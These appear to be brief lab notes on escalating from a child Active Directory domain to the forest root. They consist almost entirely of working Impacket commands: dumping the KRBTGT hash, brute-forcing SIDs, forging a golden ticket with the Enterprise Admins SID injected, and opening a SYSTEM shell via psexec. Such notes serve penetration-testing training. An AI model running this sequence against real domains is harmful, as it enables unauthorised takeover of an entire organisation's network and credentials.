We need:

• The KRBTGT hash for the child domain
• The SID for the child domain
• The name of a target user in the child domain (does not need to exist!)
• The FQDN of the child domain
• The SID of the Enterprise Admins group of the root domain

Using secretsdump.py

secretsdump.py logistics.inlanefreight.local/[email protected] -just-dc-user LOGISTICS/krbtgt

We stioll need the SID of the sub domain.

SID Brute Force with lookupsid.py:

lookupsid.py logistics.inlanefreight.local/[email protected] 
[*] Domain SID is: S-1-5-21-2806153819-209893948-922872689
...
519: INLANEFREIGHT\\Enterprise Admins (SidTypeGroup)
...

Then using ticketer.py:

ticketer.py -nthash 9d765b482771505cbe97411065964d5f -domain LOGISTICS.INLANEFREIGHT.LOCAL -domain-sid S-1-5-21-2806153819-209893948-922872689 -extra-sid S-1-5-21-3842939050-3880317879-2865463114-519 hacker

Getting a system shell with psexec.py:

export KRB5CCNAME=hacker.ccache
psexec.py LOGISTICS.INLANEFREIGHT.LOCAL/[email protected] -k -no-pass -target-ip 172.16.5.5